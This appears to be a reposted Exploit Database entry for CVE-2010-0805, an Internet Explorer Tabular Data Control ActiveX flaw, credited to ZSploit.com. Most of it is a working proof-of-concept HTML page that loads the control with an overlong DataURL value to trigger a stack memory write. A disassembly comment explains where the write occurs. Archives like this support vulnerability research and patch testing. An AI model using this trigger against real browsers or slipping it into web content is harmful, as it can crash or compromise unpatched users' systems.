Microsoft Internet Explorer Tabular Data Control – ActiveX Remote Code Execution

• Exploit Database
• 13 阅读

• 作者： ZSploit.com
  日期： 2010-04-03
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/12032/

• # CVE : CVE-2010-0805
  
  
  <!--
  .text:600058F7 and [ebp+pv], 0
  .text:600058FE lea eax, [ebp+pv]
  .text:60005904 pusheax ; unsigned __int16 **
  .text:60005905 pushdword ptr [ebx+10h] ; struct IOleClientSite *
  .text:60005908 callGetHostURL(IOleClientSite *,ushort * *)
  .text:6000590D mov eax, [ebp+var_218]
  .text:60005913 push[ebp+pv]; pv
  .text:60005919 mov [ebp+eax+var_204], 0
  .text:60005921 mov eax, [ebp+var_21C]; length of the DataURL param
  .text:60005927 mov [ebp+eax+var_104], 0; write one byte to arbitrary stack address
  -->
  <html>
  <title>Trigger for ZDI-10-034 by ZSploit.com</title>
  <head>
  </head>
  <body>
  <object classid="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83">
  <param name="DataURL" value="http://zsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploi"/>
  </object>
  </body>
  </html>
  
  
  The ZSploit Team